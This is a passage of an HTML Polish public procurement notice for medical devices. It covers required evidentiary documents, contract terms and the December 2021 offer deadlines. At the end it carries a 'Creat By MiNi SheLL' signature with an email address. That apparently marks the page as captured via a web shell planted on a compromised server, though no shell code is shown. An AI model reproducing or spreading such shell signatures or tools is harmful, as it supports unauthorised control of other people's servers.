mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp;<br/>Oświadczenie wykonawcy o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę lub ofertę częściową albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, w celu wykazania braku podstaw do wykluczenia w zakresie art. 108 ust. 1 pkt 5ustawy Pzp; – załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Deklaracje zgodności dla przedmiotu zamówienia (w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem) - potwierdzającą oznakowanie wyrobów znakiem CE lub dokument równoważny.<br/>Zgłoszenie do Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych zgodnie z ustawą z dnia z dnia 20 maja 2010 r. o wyrobach medycznych (Dz.U. z 2020 r. poz. 186), o ile jest to wymagane polskim prawem.<br/>Specyfikacja techniczna urządzeń (np. karta katalogowa producenta urządzenia) potwierdzająca oferowane parametry z OPZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający przewiduje jednokrotne wezwanie do uzupełnienia przedmiotowych środków dowodowych gdy nie zostaną złożone, zostaną złożone nieprawidłowe lub zawierające błędy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. W przypadku wyboru oferty wykonawców, wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są do złożenia, przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Istotne postanowienia w zakresie zmiany - są zawarte w projekcie umowy. Załącznik nr 8 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://rckik-radom.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-22 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com